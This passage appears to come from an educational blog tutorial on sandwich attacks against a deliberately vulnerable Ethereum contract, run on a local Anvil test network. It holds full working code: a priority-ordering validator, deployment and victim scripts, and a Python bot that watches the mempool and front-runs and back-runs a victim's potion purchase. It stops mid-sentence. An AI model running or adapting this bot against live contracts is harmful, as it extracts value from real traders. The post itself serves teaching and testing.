const provider = new ethers.JsonRpcProvider(&quot;http://localhost:8545&quot;);

console.log(&quot;Validator connected to Anvil&quot;);

// List to store pending transactions
let pendingTransactions = [];

// Listen for pending transactions
provider.on(&quot;pending&quot;, async (txHash) =&gt; {
  try {
    const tx = await provider.getTransaction(txHash);

    if (tx) {
      console.log(&quot;\nTransaction detected:&quot;);
      console.log(`  Hash: ${tx.hash}`);
      console.log(`  From: ${tx.from}`);
      console.log(`  To: ${tx.to || &quot;Contract Deployment&quot;}`);
      console.log(`  Value: ${ethers.formatEther(tx.value)} ETH`);

      // Process the gasPrice correctly
      const gasPrice = tx.gasPrice || tx.maxFeePerGas; // Handle different types of transactions
      console.log(`  Gas Price: ${ethers.formatUnits(gasPrice, &quot;gwei&quot;)} gwei`);

      // Add the transaction to the local mempool
      pendingTransactions.push(tx);
      console.log(&quot;Transaction added to local mempool.&quot;);
    }
  } catch (error) {
    console.error(`Error processing transaction ${txHash}:`, error);
  }
});

// Function to mine transactions based on priority
setInterval(async () =&gt; {
  if (pendingTransactions.length &gt; 0) {
    console.log(&quot;\nMining a new block...&quot;);

    // Sort transactions by `maxFeePerGas` or `gasPrice` in descending order
    pendingTransactions.sort((a, b) =&gt; {
      const gasA = a.maxFeePerGas ? BigInt(a.maxFeePerGas) : BigInt(a.gasPrice);
      const gasB = b.maxFeePerGas ? BigInt(b.maxFeePerGas) : BigInt(b.gasPrice);

      // Safely compare BigInt values directly
      if (gasA &gt; gasB) return -1; // Descending order: gasA is higher
      if (gasA &lt; gasB) return 1;  // gasB is higher
      return 0; // If equal
    });

    const selectedTx = pendingTransactions.shift(); // Select the transaction with the highest priority

    // Simulate mining by calling `evm_mine`
    try {
      console.log(&quot;Selected transaction for mining:&quot;, selectedTx.hash);

      // Call `evm_mine` to mine a new block
      await axios.post(&quot;http://localhost:8545&quot;, {
        jsonrpc: &quot;2.0&quot;,
        method: &quot;evm_mine&quot;,
        params: [],
        id: 1,
      });

      console.log(&quot;Transaction mined in new block:&quot;, selectedTx.hash);

      // Remove the mined transaction from the pending list
      pendingTransactions = pendingTransactions.filter(
        (tx) =&gt; tx.hash !== selectedTx.hash
      );
    } catch (error) {
      console.error(&quot;Error mining transaction:&quot;, error.message);
    }
  }
}, 5000); // Check every 5 seconds

// Listen for new blocks
provider.on(&quot;block&quot;, (blockNumber) =&gt; {
  console.log(`\nNew block mined: ${blockNumber}`);
});


```
&lt;/details&gt;


Inside the `attack` directory, we create a file named `validator.js`. Before running the script, ensure all required dependencies are installed. From the project root, we initialize a Node.js project and add the necessary packages:

```bash
npm init -y
npm install ethers axios

```

This prepares the environment for the validator to communicate with the local Anvil network and handle HTTP requests.

The validator establishes a connection to Anvil using the `ethers` library. The connection is made to the node running locally on `http://localhost:8545`. Once connected, the validator begins listening for pending transactions. Each detected transaction is analyzed to extract key details like the sender, recipient, and the value being transferred. For example, a detected transaction might show the sender&apos;s address, the amount of ETH involved, and whether it is directed at a contract or another wallet.

Here’s the section of code responsible for this behavior:

```javascript
const { ethers } = require(&quot;ethers&quot;);
const axios = require(&quot;axios&quot;);

// Connect to Anvil
const provider = new ethers.JsonRpcProvider(&quot;http://localhost:8545&quot;);
console.log(&quot;Validator connected to Anvil&quot;);

// Listen for pending transactions
provider.on(&quot;pending&quot;, async (txHash) =&gt; {
  try {
    const tx = await provider.getTransaction(txHash);
    if (tx) {
      console.log(`Transaction detected: ${tx.hash}`);
      console.log(`From: ${tx.from}, To: ${tx.to}, Value: ${ethers.formatEther(tx.value)} ETH`);
    }
  } catch (error) {
    console.error(`Error processing transaction ${txHash}:`, error);
  }
});

```

The connection to Anvil provides real-time access to the mempool. When a transaction is detected, its details are fetched and logged, giving us a live view of the blockchain’s activity.

Once transactions are collected, the validator prioritizes them based on gas price. The logic here ensures that transactions offering higher gas fees are mined first, simulating the natural behavior of miners in a real blockchain network. By sorting transactions in descending order of gas price, the validator ensures that the most profitable ones are included in the next block. The block production is then simulated by sending a command to the Anvil node, which mines the block and processes the prioritized transactions.

```javascript
setInterval(async () =&gt; {
  if (pendingTransactions.length &gt; 0) {
    pendingTransactions.sort((a, b) =&gt; {
      const gasA = a.gasPrice || a.maxFeePerGas;
      const gasB = b.gasPrice || b.maxFeePerGas;
      return gasB - gasA; // Higher gas price gets priority
    });

    const selectedTx = pendingTransactions.shift(); // Select highest-priority transaction

    try {
      console.log(&quot;Selected transaction for mining:&quot;, selectedTx.hash);
      await axios.post(&quot;http://localhost:8545&quot;, {
        jsonrpc: &quot;2.0&quot;,
        method: &quot;evm_mine&quot;,
        params: [],
        id: 1,
      });
      console.log(&quot;Transaction mined in new block:&quot;, selectedTx.hash);
    } catch (error) {
      console.error(&quot;Error mining transaction:&quot;, error.message);
    }
  }
}, 5000); // Check every 5 seconds, matching the full script above

```

Here, the validator automates the process of including transactions in blocks by calling the `evm_mine` method on the Anvil node. This step is crucial for ensuring that the front-running and back-running transactions in a Sandwich Attack are processed in the desired order.

# **Deploying the Vulnerable Contract and Simulating the Victim**

Now that we’ve set up our environment and reviewed the custom validator, the next step is to deploy the vulnerable contract (`MagicPotionMarket`) onto the local blockchain network and simulate a victim’s transaction. This process demonstrates how an attacker might observe the network and exploit specific actions.

#### **Deploying the Contract**

The deployment process is straightforward thanks to **Foundry** and its command-line tools. Using `forge create`, we compile and deploy the contract directly to the local Anvil network.

&lt;details&gt;
&lt;summary&gt;Script to deploy the contract&lt;/summary&gt;

```bash
#!/bin/bash

# Force numeric format to English (dot as the decimal separator)
export LC_NUMERIC=&quot;en_US.UTF-8&quot;

# Configuration variables
RPC_URL=&quot;http://localhost:8545&quot;  # URL for the local Anvil node
ADMIN_PK=&quot;0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80&quot;  # Admin&apos;s private key
CONTRACT_NAME=&quot;MagicPotionMarket&quot;  # Name of the contract to be deployed
CONTRACT_PATH=&quot;src/MagicPotionMarket.sol:$CONTRACT_NAME&quot;  # Path to the contract in the project directory

# Compile the contract
echo &quot;Compiling the contract...&quot;
forge build

# Deploy the contract
echo &quot;Deploying the contract $CONTRACT_NAME...&quot;
CONTRACT_ADDRESS=$(forge create $CONTRACT_PATH \
                             --rpc-url $RPC_URL \
                             --private-key $ADMIN_PK | grep &quot;Deployed to&quot; | awk &apos;{print $NF}&apos;)

# Check if the contract deployment was successful
if [ -z &quot;$CONTRACT_ADDRESS&quot; ]; then
    echo &quot;Error: Failed to deploy the contract.&quot;
    exit 1
fi

# Print the deployed contract address
echo &quot;Contract successfully deployed at: $CONTRACT_ADDRESS&quot;

# Save the contract address to a file for future reference
echo &quot;$CONTRACT_ADDRESS&quot; &gt; deployed_contract_address.txt
echo &quot;Contract address saved to &apos;deployed_contract_address.txt&apos;.&quot;

# Optionally, check the initial balance of the deployed contract
echo &quot;Checking the initial contract balance...&quot;
contract_balance=$(cast balance $CONTRACT_ADDRESS --rpc-url $RPC_URL)

# Convert the contract balance to ETH for readability
contract_balance_eth=$(awk &quot;BEGIN {print $contract_balance / 10^18}&quot;)
echo &quot;Initial contract balance: $contract_balance_eth ETH&quot;

```
&lt;/details&gt;


Let’s break down the deployment script.

```bash
#!/bin/bash

# Force numeric format to use English (dot as the decimal separator)
export LC_NUMERIC=&quot;en_US.UTF-8&quot;

# Set up variables
RPC_URL=&quot;http://localhost:8545&quot;  # Anvil node URL
ADMIN_PK=&quot;0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80&quot;  # Admin private key
CONTRACT_NAME=&quot;MagicPotionMarket&quot;  # Contract name
CONTRACT_PATH=&quot;src/MagicPotionMarket.sol:$CONTRACT_NAME&quot;  # Path to the contract

# Compile the contract
echo &quot;Compiling the contract...&quot;
forge build

```

Here, the script sets up the environment by defining the RPC URL for the Anvil node and the admin’s private key. The contract source path is specified using the `CONTRACT_PATH` variable.

The `forge build` command compiles the contract, ensuring it’s ready for deployment.

```bash
# Deploy the contract
echo &quot;Deploying the contract $CONTRACT_NAME...&quot;
CONTRACT_ADDRESS=$(forge create $CONTRACT_PATH \
                             --rpc-url $RPC_URL \
                             --private-key $ADMIN_PK | grep &quot;Deployed to&quot; | awk &apos;{print $NF}&apos;)

if [ -z &quot;$CONTRACT_ADDRESS&quot; ]; then
    echo &quot;Error: Contract deployment failed.&quot;
    exit 1
fi

```

The `forge create` command deploys the contract to the blockchain. The script extracts the deployed contract address and stores it in the `CONTRACT_ADDRESS` variable. If deployment fails, the script halts with an error message.

```bash
echo &quot;Contract deployed successfully at: $CONTRACT_ADDRESS&quot;

# Save the contract address to a file for later use
echo &quot;$CONTRACT_ADDRESS&quot; &gt; deployed_contract_address.txt
echo &quot;Contract address saved to &apos;deployed_contract_address.txt&apos;.&quot;

# Optional: Verify the contract&apos;s initial balance
echo &quot;Checking the initial contract balance...&quot;
contract_balance=$(cast balance $CONTRACT_ADDRESS --rpc-url $RPC_URL)
contract_balance_eth=$(awk &quot;BEGIN {print $contract_balance / 10^18}&quot;)
echo &quot;Initial contract balance: $contract_balance_eth ETH&quot;


```

For convenience, the contract’s address is saved to a file, making it easy to reference in subsequent scripts. The initial balance of the contract can also be verified using the `cast balance` command.
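One caveat: the `awk` division is fine for display, but floating point loses precision once a balance exceeds 2^53 wei. A sketch of an exact alternative in Python (the balance value is made up for illustration):

```python
from decimal import Decimal

balance_wei = 10_000_000_000_000_000_123  # example balance just above 10 ETH
balance_eth = Decimal(balance_wei) / Decimal(10**18)
print(balance_eth)  # 10.000000000000000123, with no precision loss
```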

#### **Victim Transaction Simulation**

Once the contract is deployed, the next step is simulating a victim’s transaction. This involves purchasing 10 potions, creating a predictable price increase that the attacker can exploit.

&lt;details&gt;
&lt;summary&gt;Victim Simulation Code&lt;/summary&gt;

```bash
#!/bin/bash

# Force numeric format to English (dot as the decimal separator)
export LC_NUMERIC=&quot;en_US.UTF-8&quot;

# Set up variables
RPC_URL=&quot;http://localhost:8545&quot;
PLAYER_PK=&quot;0x59c6995e998f97a5a0044966f0945389dc9e86dae88c7a8412f4603b6b78690d&quot;
CONTRACT_ADDRESS=&quot;0xCf7Ed3AccA5a467e9e704C703E8D87F634fB0Fc9&quot;

# Player buys potions
echo &quot;Player buying potions...&quot;
CURRENT_PRICE=$(cast call $CONTRACT_ADDRESS &quot;potionPrice()&quot; --rpc-url $RPC_URL)

# Convert CURRENT_PRICE to decimal (BigInt handling)
CURRENT_PRICE=$(echo $CURRENT_PRICE | sed &apos;s/0x//g&apos;)
CURRENT_PRICE_DECIMAL=$(printf &quot;%d&quot; &quot;0x$CURRENT_PRICE&quot;)

# Validate CURRENT_PRICE_DECIMAL
if [ &quot;$CURRENT_PRICE_DECIMAL&quot; -le 0 ]; then
    echo &quot;Error: Invalid potion price detected: $CURRENT_PRICE_DECIMAL Wei&quot;
    exit 1
fi

echo &quot;Current potion price (Wei): $CURRENT_PRICE_DECIMAL&quot;

PLAYER_PURCHASE_AMOUNT=10

# Use `bc` for big number calculations
TOTAL_COST=$(echo &quot;$PLAYER_PURCHASE_AMOUNT * $CURRENT_PRICE_DECIMAL&quot; | bc)
TOTAL_COST_ETH=$(echo &quot;scale=18; $TOTAL_COST / 10^18&quot; | bc)

# Validate TOTAL_COST
if [ &quot;$(echo &quot;$TOTAL_COST &lt;= 0&quot; | bc)&quot; -eq 1 ]; then  # bc: the value exceeds the shell&apos;s 64-bit integers
    echo &quot;Error: Invalid total cost calculated: $TOTAL_COST Wei&quot;
    exit 1
fi

echo &quot;Player buying $PLAYER_PURCHASE_AMOUNT potions for $TOTAL_COST_ETH ETH...&quot;

# Send transaction
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $PLAYER_PK \
          --value $TOTAL_COST \
          &quot;buyPotions(uint256)&quot; $PLAYER_PURCHASE_AMOUNT

if [ $? -eq 0 ]; then
    echo &quot;Potion purchase completed by player.&quot;
else
    echo &quot;Error: Potion purchase failed.&quot;
    exit 1
fi

# Display final balances
echo &quot;Final balances:&quot;
admin_balance=$(cast balance 0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266 --rpc-url $RPC_URL)
player_balance=$(cast balance 0x70997970C51812dc3A010C7d01b50e0d17dc79C8 --rpc-url $RPC_URL)

# Convert balances to ETH
admin_eth=$(echo &quot;scale=4; $admin_balance / 10^18&quot; | bc)
player_eth=$(echo &quot;scale=4; $player_balance / 10^18&quot; | bc)

echo &quot;Admin: $admin_eth ETH&quot;
echo &quot;Player: $player_eth ETH&quot;


```
&lt;/details&gt;


```bash
#!/bin/bash

# Force numeric format to use English (dot as the decimal separator)
export LC_NUMERIC=&quot;en_US.UTF-8&quot;

# Set up variables
RPC_URL=&quot;http://localhost:8545&quot;  # Anvil node URL
PLAYER_PK=&quot;0x59c6995e998f97a5a0044966f0945389dc9e86dae88c7a8412f4603b6b78690d&quot;  # Victim&apos;s private key
CONTRACT_ADDRESS=&quot;0xCf7Ed3AccA5a467e9e704C703E8D87F634fB0Fc9&quot;  # Contract address

```


The script initializes the victim’s private key and references the previously deployed contract’s address.

```bash
# Retrieve the current potion price
echo &quot;Player buying potions...&quot;
CURRENT_PRICE=$(cast call $CONTRACT_ADDRESS &quot;potionPrice()&quot; --rpc-url $RPC_URL)

# Convert CURRENT_PRICE to decimal (BigInt handling)
CURRENT_PRICE=$(echo $CURRENT_PRICE | sed &apos;s/0x//g&apos;)
CURRENT_PRICE_DECIMAL=$(printf &quot;%d&quot; &quot;0x$CURRENT_PRICE&quot;)

# Validate CURRENT_PRICE_DECIMAL
if [ &quot;$CURRENT_PRICE_DECIMAL&quot; -le 0 ]; then
    echo &quot;Error: Invalid potion price detected: $CURRENT_PRICE_DECIMAL Wei&quot;
    exit 1
fi

echo &quot;Current potion price (Wei): $CURRENT_PRICE_DECIMAL&quot;

```

Using `cast call`, the script fetches the current potion price from the contract. The price, returned in hexadecimal, is converted into decimal for further calculations. The script ensures the price is valid before proceeding.

```bash
PLAYER_PURCHASE_AMOUNT=10  # Amount of potions to buy

# Calculate the total cost using `bc` for big number calculations
TOTAL_COST=$(echo &quot;$PLAYER_PURCHASE_AMOUNT * $CURRENT_PRICE_DECIMAL&quot; | bc)
TOTAL_COST_ETH=$(echo &quot;scale=18; $TOTAL_COST / 10^18&quot; | bc)

# Validate TOTAL_COST
if [ &quot;$(echo &quot;$TOTAL_COST &lt;= 0&quot; | bc)&quot; -eq 1 ]; then  # bc: the value exceeds the shell&apos;s 64-bit integers
    echo &quot;Error: Invalid total cost calculated: $TOTAL_COST Wei&quot;
    exit 1
fi

echo &quot;Player buying $PLAYER_PURCHASE_AMOUNT potions for $TOTAL_COST_ETH ETH...&quot;

```

The total cost for purchasing 10 potions is calculated with `bc`, which handles integers larger than the shell’s native 64-bit range. The result is then validated to be positive before the transaction is sent.
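For comparison, the same computation is trivial in a language with arbitrary-precision integers; `bc` is only needed because shell arithmetic is 64-bit. A quick Python equivalent:

```python
amount = 10
price_wei = 10**18              # 1 ETH per potion
total_wei = amount * price_wei  # 10**19 wei, beyond a signed 64-bit integer
total_eth = total_wei / 10**18
print(total_wei, total_eth)     # 10000000000000000000 10.0
```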

```bash
# Send the transaction
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $PLAYER_PK \
          --value $TOTAL_COST \
          &quot;buyPotions(uint256)&quot; $PLAYER_PURCHASE_AMOUNT

if [ $? -eq 0 ]; then
    echo &quot;Potion purchase completed by player.&quot;
else
    echo &quot;Error: Potion purchase failed.&quot;
    exit 1
fi

```

The victim’s transaction is sent with `cast send`, which calls the contract’s `buyPotions` function: the number of potions is passed as the function argument, and the calculated total cost is attached as the transaction value via `--value`.

```bash
# Display final balances
echo &quot;Final balances:&quot;
admin_balance=$(cast balance 0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266 --rpc-url $RPC_URL)
player_balance=$(cast balance 0x70997970C51812dc3A010C7d01b50e0d17dc79C8 --rpc-url $RPC_URL)

# Convert balances to ETH
admin_eth=$(echo &quot;scale=4; $admin_balance / 10^18&quot; | bc)
player_eth=$(echo &quot;scale=4; $player_balance / 10^18&quot; | bc)

echo &quot;Admin: $admin_eth ETH&quot;
echo &quot;Player: $player_eth ETH&quot;

```

After the transaction, the script fetches and displays the final balances of both the victim and the admin. This provides a clear snapshot of the state after the victim’s trade.

# **Automating the Sandwich Attack with Python**

Now that we have the vulnerable contract deployed and the victim’s transaction simulated, it’s time to automate the Sandwich Attack using a Python bot.

&lt;details&gt;
&lt;summary&gt;Python Bot&lt;/summary&gt;

```python
# %% Cell 1
from web3 import Web3
import time
import json

# Connect to the local blockchain network
anvil_url = &quot;http://127.0.0.1:8545&quot;  # Local Anvil node
web3 = Web3(Web3.HTTPProvider(anvil_url))

# Check if the connection is successful
if not web3.is_connected():
    print(&quot;Error: Could not connect to the network.&quot;)
else:
    print(&quot;Connection established with the local network.&quot;)

# %% Cell 2
# Load the contract configuration and attacker details
CONTRACT_ADDRESS = &quot;0xCf7Ed3AccA5a467e9e704C703E8D87F634fB0Fc9&quot;  # Replace with your deployed contract address
with open(&quot;./out/MagicPotionMarket.sol/MagicPotionMarket.json&quot;) as f:
    contract_json = json.load(f)
    CONTRACT_ABI = contract_json[&quot;abi&quot;]

# Initialize the contract
potion_contract = web3.eth.contract(address=CONTRACT_ADDRESS, abi=CONTRACT_ABI)

# Attacker configuration
ATTACKER = {
    &quot;address&quot;: &quot;0x3C44CdDdB6a900fa2b585dd299e03d12FA4293BC&quot;,  # Attacker&apos;s address
    &quot;private_key&quot;: &quot;0x5de4111afa1a4b94908f83103eb1f1706367c2e68ca870fc3fb9a804cdab365a&quot;  # Attacker&apos;s private key
}

# Parameters for the attack
GAS_PRICE_MULTIPLIER = 1.5  # Multiplier for gas price during front-running
POTION_THRESHOLD = 5        # Minimum number of potions for a transaction to be interesting

print(&quot;Contract initialized and attacker configured.&quot;)

# %% Cell 3
# Helper functions to interact with the blockchain
def build_signed_tx(function_call, gas_price, value=0):
    &quot;&quot;&quot;
    Build and sign a transaction.
    &quot;&quot;&quot;
    tx = function_call.build_transaction({
        &apos;from&apos;: ATTACKER[&quot;address&quot;],
        &apos;gas&apos;: 2000000,
        &apos;gasPrice&apos;: gas_price,
        &apos;nonce&apos;: web3.eth.get_transaction_count(ATTACKER[&quot;address&quot;]),
        &apos;value&apos;: int(value)  # Ensure the value is an integer
    })
    signed_tx = web3.eth.account.sign_transaction(tx, ATTACKER[&quot;private_key&quot;])
    return signed_tx

def send_tx(signed_tx):
    &quot;&quot;&quot;
    Send a signed transaction and wait for its receipt.
    &quot;&quot;&quot;
    tx_hash = web3.eth.send_raw_transaction(signed_tx.raw_transaction)
    receipt = web3.eth.wait_for_transaction_receipt(tx_hash)
    return receipt

# %% Cell 4
# Monitor the mempool and execute the Sandwich Attack
def monitor_mempool_and_attack():
    print(&quot;Monitoring the mempool for interesting transactions...&quot;)
    pending_filter = web3.eth.filter(&quot;pending&quot;)

    # Track the attacker&apos;s initial balance
    initial_balance = web3.eth.get_balance(ATTACKER[&quot;address&quot;])

    while True:
        try:
            pending_txs = pending_filter.get_new_entries()
            for tx_hash in pending_txs:
                tx = web3.eth.get_transaction(tx_hash)

                # Ignore transactions from the attacker
                if tx[&quot;from&quot;].lower() == ATTACKER[&quot;address&quot;].lower():
                    continue

                # Check if the transaction interacts with the target contract
                if tx[&quot;to&quot;] == CONTRACT_ADDRESS:
                    decoded_input = potion_contract.decode_function_input(tx[&quot;input&quot;])
                    function_name = decoded_input[0].fn_name
                    args = decoded_input[1]

                    if function_name == &quot;buyPotions&quot; and args[&quot;amount&quot;] &gt;= POTION_THRESHOLD:
                        print(f&quot;Interesting transaction detected: {tx_hash.hex()} | {args[&apos;amount&apos;]} potions&quot;)

                        # Fetch the current potion price
                        potion_price = potion_contract.functions.potionPrice().call()
                        print(f&quot;Current potion price (Wei): {potion_price}&quot;)

                        # Baseline for comparison: without the attack the attacker earns nothing
                        no_attack_profit = 0

                        # Execute front-running
                        print(&quot;Executing Front-Run...&quot;)
                        gas_price = int(web3.eth.gas_price * GAS_PRICE_MULTIPLIER)
                        value = int((args[&quot;amount&quot;] + 5) * potion_price)  # Total cost calculation
                        print(f&quot;Value to send in Front-Run (Wei): {value}&quot;)

                        front_run_signed = build_signed_tx(
                            potion_contract.functions.buyPotions(args[&quot;amount&quot;] + 5),
                            gas_price,
                            value=value
                        )
                        send_tx(front_run_signed)
                        print(&quot;Front-Run completed.&quot;)

                        # Wait for the victim&apos;s transaction to confirm
                        print(&quot;Waiting for the victim&apos;s transaction to confirm...&quot;)
                        web3.eth.wait_for_transaction_receipt(tx_hash)  # polling get_transaction_receipt would raise TransactionNotFound while pending

                        # Execute back-running
                        print(&quot;Executing Back-Run...&quot;)
                        back_run_signed = build_signed_tx(
                            potion_contract.functions.sellPotions(args[&quot;amount&quot;] + 5),
                            gas_price,
                            value=0  # No ETH sent during sell
                        )
                        send_tx(back_run_signed)
                        print(&quot;Back-Run completed. Sandwich Attack successful.&quot;)

                        # Calculate and display profits
                        final_balance = web3.eth.get_balance(ATTACKER[&quot;address&quot;])
                        attack_profit = web3.from_wei(final_balance - initial_balance, &quot;ether&quot;)
                        no_attack_profit_eth = web3.from_wei(no_attack_profit, &quot;ether&quot;)

                        # Display the results
                        print(&quot;\n=== Sandwich Attack Summary ===&quot;)
                        print(f&quot;Profit WITHOUT attack: {no_attack_profit_eth:.4f} ETH&quot;)
                        print(f&quot;Profit WITH attack: {attack_profit:.4f} ETH&quot;)
                        print(f&quot;Total Sandwich Attack Profit: {attack_profit - no_attack_profit_eth:.4f} ETH&quot;)
                        return  # Exit the loop after a successful attack

        except Exception as e:
            print(f&quot;Error: {e}&quot;)
        time.sleep(1)

# %% Cell 5
# Run the bot
if __name__ == &quot;__main__&quot;:
    try:
        monitor_mempool_and_attack()
    except KeyboardInterrupt:
        print(&quot;Bot stopped manually.&quot;)


```
&lt;/details&gt;


This bot will monitor the blockchain for pending transactions, execute a front-running transaction to profit from the price increase, and follow it up with a back-running transaction to sell at the inflated price.

```python
# %% Cell 1
from web3 import Web3
import time
import json

# Connect to the local blockchain network
anvil_url = &quot;http://127.0.0.1:8545&quot;  # Local Anvil node
web3 = Web3(Web3.HTTPProvider(anvil_url))

# Check if the connection is successful
if not web3.is_connected():
    print(&quot;Error: Could not connect to the network.&quot;)
else:
    print(&quot;Connection to the local network established.&quot;)

```

The bot starts by connecting to the local blockchain network using `web3.py`. It verifies the connection to ensure the script can interact with the blockchain.

```python
# %% Cell 2
# Load the contract and attacker configuration
CONTRACT_ADDRESS = &quot;0xCf7Ed3AccA5a467e9e704C703E8D87F634fB0Fc9&quot;  # Replace with the deployed contract address
with open(&quot;./out/MagicPotionMarket.sol/MagicPotionMarket.json&quot;) as f:
    contract_json = json.load(f)
    CONTRACT_ABI = contract_json[&quot;abi&quot;]

potion_contract = web3.eth.contract(address=CONTRACT_ADDRESS, abi=CONTRACT_ABI)

# Attacker details
ATTACKER = {
    &quot;address&quot;: &quot;0x3C44CdDdB6a900fa2b585dd299e03d12FA4293BC&quot;,  # Attacker&apos;s address
    &quot;private_key&quot;: &quot;0x5de4111afa1a4b94908f83103eb1f1706367c2e68ca870fc3fb9a804cdab365a&quot;  # Attacker&apos;s private key
}

# Set the parameters for the attack
GAS_PRICE_MULTIPLIER = 1.5  # Gas price multiplier for front-running
POTION_THRESHOLD = 5        # Minimum potions for a transaction to be interesting

print(&quot;Contract initialized and attacker configured.&quot;)

```

The script loads the ABI and deployed contract address to interact with the `MagicPotionMarket` contract. The attacker’s wallet address and private key are also defined here, as well as the attack parameters, such as the gas price multiplier and potion threshold.

```python
# %% Cell 3
# Helper functions for transactions
def build_signed_tx(function_call, gas_price, value=0):
    &quot;&quot;&quot;
    Build and sign a transaction.
    &quot;&quot;&quot;
    tx = function_call.build_transaction({
        &apos;from&apos;: ATTACKER[&quot;address&quot;],
        &apos;gas&apos;: 2000000,
        &apos;gasPrice&apos;: gas_price,
        &apos;nonce&apos;: web3.eth.get_transaction_count(ATTACKER[&quot;address&quot;]),
        &apos;value&apos;: int(value)  # Ensure the value is an integer
    })
    signed_tx = web3.eth.account.sign_transaction(tx, ATTACKER[&quot;private_key&quot;])
    return signed_tx

def send_tx(signed_tx):
    &quot;&quot;&quot;
    Send a signed transaction and wait for its receipt.
    &quot;&quot;&quot;
    tx_hash = web3.eth.send_raw_transaction(signed_tx.raw_transaction)
    receipt = web3.eth.wait_for_transaction_receipt(tx_hash)
    return receipt

```

These helper functions simplify the process of creating, signing, and sending transactions. `build_signed_tx` prepares a transaction for functions like `buyPotions` or `sellPotions`, while `send_tx` sends the signed transaction and waits for confirmation.

```python
# %% Cell 4
# Monitor the mempool and execute the Sandwich Attack
def monitor_mempool_and_attack():
    print(&quot;Monitoring the mempool for interesting transactions...&quot;)
    pending_filter = web3.eth.filter(&quot;pending&quot;)

    # Track the attacker&apos;s initial balance
    initial_balance = web3.eth.get_balance(ATTACKER[&quot;address&quot;])

    while True:
        try:
            pending_txs = pending_filter.get_new_entries()
            for tx_hash in pending_txs:
                tx = web3.eth.get_transaction(tx_hash)

                # Skip transactions from the attacker
                if tx[&quot;from&quot;].lower() == ATTACKER[&quot;address&quot;].lower():
                    continue

                # Check if the transaction interacts with the target contract
                if tx[&quot;to&quot;] == CONTRACT_ADDRESS:
                    decoded_input = potion_contract.decode_function_input(tx[&quot;input&quot;])
                    function_name = decoded_input[0].fn_name
                    args = decoded_input[1]

                    if function_name == &quot;buyPotions&quot; and args[&quot;amount&quot;] &gt;= POTION_THRESHOLD:
                        print(f&quot;Interesting transaction detected: {tx_hash.hex()} | {args[&apos;amount&apos;]} potions&quot;)

                        # Fetch the current potion price
                        potion_price = potion_contract.functions.potionPrice().call()
                        print(f&quot;Current potion price (Wei): {potion_price}&quot;)

                        # Execute front-running
                        print(&quot;Executing Front-Run...&quot;)
                        gas_price = int(web3.eth.gas_price * GAS_PRICE_MULTIPLIER)
                        value = int((args[&quot;amount&quot;] + 5) * potion_price)
                        front_run_signed = build_signed_tx(
                            potion_contract.functions.buyPotions(args[&quot;amount&quot;] + 5),
                            gas_price,
                            value=value
                        )
                        send_tx(front_run_signed)
                        print(&quot;Front-Run completed.&quot;)

                        # Wait for the victim&apos;s transaction to confirm
                        print(&quot;Waiting for the victim&apos;s transaction to confirm...&quot;)
                        web3.eth.wait_for_transaction_receipt(tx_hash)  # polling get_transaction_receipt would raise TransactionNotFound while pending

                        # Execute back-running
                        print(&quot;Executing Back-Run...&quot;)
                        back_run_signed = build_signed_tx(
                            potion_contract.functions.sellPotions(args[&quot;amount&quot;] + 5),
                            gas_price
                        )
                        send_tx(back_run_signed)
                        print(&quot;Back-Run completed. Sandwich Attack successful.&quot;)

                        # Calculate and display profits
                        final_balance = web3.eth.get_balance(ATTACKER[&quot;address&quot;])
                        attack_profit = web3.from_wei(final_balance - initial_balance, &quot;ether&quot;)
                        print(f&quot;Profit from Sandwich Attack: {attack_profit:.4f} ETH&quot;)
                        return  # Exit after a successful attack

        except Exception as e:
            print(f&quot;Error: {e}&quot;)
        time.sleep(1)

```

The bot continuously monitors the mempool for transactions involving the `buyPotions` function of the vulnerable contract. When it detects a qualifying transaction:

-   It performs a **front-run** by buying additional potions before the victim’s transaction.
-   After the victim’s transaction completes, it executes a **back-run** to sell the potions at the inflated price.

Finally, it calculates the profit from the attack and displays it.
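The key knob is `GAS_PRICE_MULTIPLIER`. A small sketch of the bump (the 2 gwei base gas price is an assumed, purely illustrative value):

```python
GAS_PRICE_MULTIPLIER = 1.5          # value from the bot&apos;s configuration
network_gas_price = 2_000_000_000   # assumed 2 gwei base, for illustration
victim_gas = network_gas_price      # the victim pays the going rate
attacker_gas = int(network_gas_price * GAS_PRICE_MULTIPLIER)
print(attacker_gas)                 # 3000000000, outranking the victim
```

Because the validator orders strictly by gas price, a 1.5x bump guarantees the front-run lands before the victim’s buy in this simulation; on mainnet, block builders and priority fees turn this into a bidding war instead.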

# The Sandwich Attack in Action

Now that we’ve explored the contract vulnerabilities, set up our validator, and simulated both the victim’s and attacker’s transactions, it’s time to tie everything together. The goal of this section is to walk you through the process step-by-step, showing how the pieces fit and explaining the final results of the Sandwich Attack. By the end, you’ll have a clear understanding of how an attacker profits from manipulating the mempool and price mechanics.

**Setting Up the Network**

![](/content/images/2024/12/image-7.png)

Anvil set up

We start by initializing Anvil, Foundry’s blockchain simulation tool, configured with a custom block time of 20 seconds. This delay between blocks gives our validator enough time to monitor transactions in the mempool and execute the necessary front-running and back-running operations.

**Configuring the Validator**

![](/content/images/2024/12/image-8.png)

Validator Running Output

Next, we execute the validator using **nodemon**, which continuously runs our script and restarts it automatically when changes are detected. This setup ensures a seamless monitoring experience, allowing the validator to stay active and responsive to pending transactions in the mempool.

**Deploying the Contract and Simulating the Victim**

With the network and validator ready, we utilize the deployment script previously discussed to deploy the **MagicPotionMarket** contract. This script handles everything from compiling the contract to deploying it and saving its address for later use.

![](/content/images/2024/12/image-15.png)

Contract deployed

Once the contract is deployed successfully, we proceed to simulate the victim’s transaction. In this scenario, the victim attempts to purchase 10 potions, with the initial price set at **1 ETH per potion**.

The victim’s purchase triggers an increase in the potion price, calculated as:

$$\text{Price Increase} = \text{Amount Bought by Victim} \times 0.01 \, \text{ETH} $$

$$\text{Price Increase} = 10 \times 0.01 = 0.1 \, \text{ETH}$$

This dynamic pricing mechanism plays a crucial role in the profitability of the attack.

![](/content/images/2024/12/image-16.png)

Victim&apos;s Transaction Output

**The Attack in Action**

Once the validator detects the victim’s transaction in the mempool, the bot initiates the Sandwich Attack. The bot executes a **front-run**, buying **15 potions** before the victim. This front-run causes the potion price to rise by:

